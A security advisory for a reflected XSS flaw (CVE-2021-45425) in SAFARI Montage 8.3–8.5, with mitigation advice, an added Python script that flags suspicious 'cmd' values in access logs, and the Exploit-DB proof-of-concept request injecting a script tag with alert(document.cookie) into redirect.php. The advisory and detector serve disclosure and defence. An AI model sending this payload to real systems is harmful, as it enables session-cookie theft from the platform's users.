Vendor: SAFARI Montage
By: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)
CVSS: 6.1 (MEDIUM)
Vulnerability: Reflected Cross Site Scripting (XSS)
CWE: 79
Product Name: SAFARI Montage
Affected Version From: 8.3
Affected Version To: 8.5
Patch Exists: NO
Related CVE: CVE-2021-45425
CPE: a:safari_montage:safari_montage:8.3 cpe:/a:safari_montage:safari_montage:8.5
Platforms Tested: Ubuntu Linux [Firefox]
2021

SAFARI Montage 8.5 – Reflected Cross Site Scripting (XSS)

SAFARI Montage version 8.5 is vulnerable to reflected cross-site scripting (XSS). An attacker can execute arbitrary JavaScript in the victim's browser by injecting it through the 'cmd' parameter of 'redirect.php'. This allows the attacker to steal sensitive information, such as session cookies, from the victim.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before using it in dynamic web content. Proper input validation combined with output encoding helps prevent XSS attacks.
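
An added example, not part of the original advisory or the vendor's code: since the page lists no patch, the input-validation advice above is shown here as an allow-list check on `cmd`, used to review web-server access logs for requests to `redirect.php` that fail it. The allow-list pattern, the function names and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

SAFE_CMD = re.compile(r"[A-Za-z0-9_-]{1,64}")  # assumption: valid cmd values are short tokens
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def cmd_is_valid(cmd):
    """Allow-list check a server-side filter could apply to 'cmd'."""
    return SAFE_CMD.fullmatch(fully_decode(cmd)) is not None


def flag_log_lines(lines):
    """Return (line_number, decoded_cmd) for redirect.php hits whose cmd fails the check."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/redirect.php"):
            continue
        # parse_qs performs the first round of percent-decoding
        for cmd in parse_qs(url.query, keep_blank_values=True).get("cmd", []):
            if not cmd_is_valid(cmd):
                hits.append((number, fully_decode(cmd)))
    return hits


# Constructed sample access-log lines (documentation IP addresses, invented sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Dec/2021:10:00:01 +0000] "GET /redirect.php?cmd=login&ret=3 HTTP/1.1" 200 512',
    '192.0.2.11 - - [28/Dec/2021:10:00:05 +0000] "GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1" 200 734',
    '192.0.2.12 - - [28/Dec/2021:10:00:09 +0000] "GET /redirect.php?cmd=x%253Cb%253E&ret=3 HTTP/1.1" 200 600',
    '192.0.2.13 - - [28/Dec/2021:10:00:12 +0000] "GET /index.php?cmd=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, cmd in flag_log_lines(SAMPLE_LOG):
        print(f"line {number}: cmd fails allow-list: {cmd!r}")
```

The same `cmd_is_valid` check only covers the input side; the value still needs HTML output encoding wherever the application reflects it.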

Exploit-DB raw data:

# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
# Date: 28/12/2021
# Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)
# Vendor Homepage: https://www.safarimontage.com/
# Version: 8.3 and 8.5
# Tested on: Ubuntu Linux [Firefox]
# CVE: CVE-2021-45425

# Proof of Concept:

GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1
Host: vulnIP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=SSSION; lang=en
Connection: close